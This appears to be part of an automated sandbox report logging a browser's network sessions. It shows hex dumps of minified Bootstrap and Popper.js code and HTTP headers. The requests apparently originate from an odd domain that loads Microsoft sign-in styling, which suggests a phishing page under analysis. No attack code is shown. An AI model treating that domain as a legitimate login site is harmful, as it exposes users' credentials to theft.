                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 2e 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28
                                                                                                                                                    Data Ascii: .CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._destroyElement(
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 43 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74
                                                                                                                                                    Data Ascii: Class(C)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttribut
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 79 3d 7b 41 43
                                                                                                                                                    Data Ascii: i,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-item-prev",y={AC
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69 6e 64 28 79 2e 41 43 54 49 56 45 5f 49 54
                                                                                                                                                    Data Ascii: erval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).find(y.ACTIVE_IT
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65 29 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 42
                                                                                                                                                    Data Ascii: tarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e)},C._getItemB
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 67 2b 22
                                                                                                                                                    Data Ascii: latedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).removeClass(g+"
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61 70 73 65 22 2c 6e 3d 22 62 73 2e 63 6f 6c
                                                                                                                                                    Data Ascii: ction(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="collapse",n="bs.col


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    4192.168.2.449750104.17.25.144433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:03 UTC643OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                                                                                                                                                    Host: cdnjs.cloudflare.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:03 UTC963INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:03 GMT
                                                                                                                                                    Content-Type: application/javascript; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Cache-Control: public, max-age=30672000
                                                                                                                                                    ETag: W/"5eb03fa9-4af4"
                                                                                                                                                    Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                                                                                                                                                    cf-cdnjs-via: cfworker/kv
                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                    Age: 1107925
                                                                                                                                                    Expires: Mon, 29 Dec 2025 08:53:03 GMT
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bnkQBzMEZrEIaG5dAaNAlMdLX1%2FJYZiQqsKpej58on9pBVBThyR%2B6Dlq2Edxev39LUt18tC99h1vvhXydsSLH3IKkw1VgXmznF%2Fp8rEe1TyOXs%2F7ZmBMJ3VJPYkAiKGaC%2FtPpMAM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Strict-Transport-Security: max-age=15780000
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf47b5f9b8c30-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    2025-01-08 08:53:03 UTC406INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                                                                                                                                                    Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75 6d
                                                                                                                                                    Data Ascii: 1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#docum
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27 62
                                                                                                                                                    Data Ascii: ,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['b
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 7b 74 6f 70 3a 70 2e 74 6f 70 2d 73 2e 74 6f 70 2d 66 2c 6c 65 66 74 3a 70 2e 6c 65 66 74 2d 73 2e 6c 65 66 74 2d 6d 2c 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 29 3b 69 66 28 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 30 2c 21 69 26 26 72 29 7b 76 61 72 20 75 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 54 6f 70 2c 31 30 29 2c 62 3d 70 61 72 73 65 46 6c 6f 61 74 28 61 2e 6d 61 72 67 69 6e 4c 65 66 74 2c 31 30 29 3b 68 2e 74 6f 70 2d 3d 66 2d 75 2c 68 2e 62 6f 74 74 6f 6d 2d 3d 66 2d 75 2c 68 2e 6c 65 66 74 2d 3d 6d 2d 62 2c 68 2e 72 69 67 68 74 2d 3d 6d 2d 62 2c 68 2e 6d 61 72 67 69 6e 54 6f 70 3d 75 2c 68 2e 6d 61 72 67 69 6e 4c 65 66 74 3d 62 7d 72 65
                                                                                                                                                    Data Ascii: {top:p.top-s.top-f,left:p.left-s.left-m,width:p.width,height:p.height});if(h.marginTop=0,h.marginLeft=0,!i&&r){var u=parseFloat(a.marginTop,10),b=parseFloat(a.marginLeft,10);h.top-=f-u,h.bottom-=f-u,h.left-=m-b,h.right-=m-b,h.marginTop=u,h.marginLeft=b}re
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 2c 62 6f 74 74 6f 6d 3a 7b 77 69 64 74 68 3a 70 2e 77 69 64 74 68 2c 68 65 69 67 68 74 3a 70 2e 62 6f 74 74 6f 6d 2d 74 2e 62 6f 74 74 6f 6d 7d 2c 6c 65 66 74 3a 7b 77 69 64 74 68 3a 74 2e 6c 65 66 74 2d 70 2e 6c 65 66 74 2c 68 65 69 67 68 74 3a 70 2e 68 65 69 67 68 74 7d 7d 2c 64 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 65 28 7b 6b 65 79 3a 65 7d 2c 73 5b 65 5d 2c 7b 61 72 65 61 3a 45 28 73 5b 65 5d 29 7d 29 7d 29 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 72 65 61 2d 65 2e 61 72 65 61 7d 29 2c 61 3d 64 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65
                                                                                                                                                    Data Ascii: height:p.height},bottom:{width:p.width,height:p.bottom-t.bottom},left:{width:t.left-p.left,height:p.height}},d=Object.keys(s).map(function(e){return se({key:e},s[e],{area:E(s[e])})}).sort(function(e,t){return t.area-e.area}),a=d.filter(function(e){var t=e
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 73 6f 6c 65 2e 77 61 72 6e 28 27 60 6d 6f 64 69 66 69 65 72 2e 66 75 6e 63 74 69 6f 6e 60 20 69 73 20 64 65 70 72 65 63 61 74 65 64 2c 20 75 73 65 20 60 6d 6f 64 69 66 69 65 72 2e 66 6e 60 21 27 29 3b 76 61 72 20 69 3d 74 5b 27 66 75 6e 63 74 69 6f 6e 27 5d 7c 7c 74 2e 66 6e 3b 74 2e 65 6e 61 62 6c 65 64 26 26 65 28 69 29 26 26 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 70 6f 70 70 65 72 29 2c 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 3d 63 28 6f 2e 6f 66 66 73 65 74 73 2e 72 65 66 65 72 65 6e 63 65 29 2c 6f 3d 69 28 6f 2c 74 29 29 7d 29 2c 6f 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 29 7b 69 66 28 21 74 68 69 73 2e 73 74 61 74 65 2e 69 73 44 65 73 74 72 6f 79 65 64 29 7b 76 61 72 20 65 3d 7b 69 6e
                                                                                                                                                    Data Ascii: sole.warn('`modifier.function` is deprecated, use `modifier.fn`!');var i=t['function']||t.fn;t.enabled&&e(i)&&(o.offsets.popper=c(o.offsets.popper),o.offsets.reference=c(o.offsets.reference),o=i(o,t))}),o}function N(){if(!this.state.isDestroyed){var e={in
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 72 65 6d 6f 76 65 4f 6e 44 65 73 74 72 6f 79 26 26 74 68 69 73 2e 70 6f 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 68 69 73 2e 70 6f 70 70 65 72 29 2c 74 68 69 73 7d 66 75 6e 63 74 69 6f 6e 20 42 28 65 29 7b 76 61 72 20 74 3d 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3b 72 65 74 75 72 6e 20 74 3f 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 77 69 6e 64 6f 77 7d 66 75 6e 63 74 69 6f 6e 20 48 28 65 2c 74 2c 6f 2c 69 29 7b 76 61 72 20 72 3d 27 42 4f 44 59 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 2c 70 3d 72 3f 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 3a 65 3b 70 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 74 2c 6f 2c 7b 70
                                                                                                                                                    Data Ascii: ,this.options.removeOnDestroy&&this.popper.parentNode.removeChild(this.popper),this}function B(e){var t=e.ownerDocument;return t?t.defaultView:window}function H(e,t,o,i){var r='BODY'===e.nodeName,p=r?e.ownerDocument.defaultView:e;p.addEventListener(t,o,{p
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 72 65 74 75 72 6e 20 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b
                                                                                                                                                    Data Ascii: return o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 72 65 74 75 72 6e 27 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74
                                                                                                                                                    Data Ascii: return''===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}funct
                                                                                                                                                    2025-01-08 08:53:03 UTC1369INData Raw: 72 65 74 75 72 6e 20 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74
                                                                                                                                                    Data Ascii: return o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=argument


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    5192.168.2.449743152.199.21.1754433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:04 UTC635OUTGET /ests/2.1/content/cdnbundles/converged.v2.login.min_kfhrfyfy-sm2tmkm5ficcw2.css HTTP/1.1
                                                                                                                                                    Host: aadcdn.msftauth.net
                                                                                                                                                    Connection: keep-alive
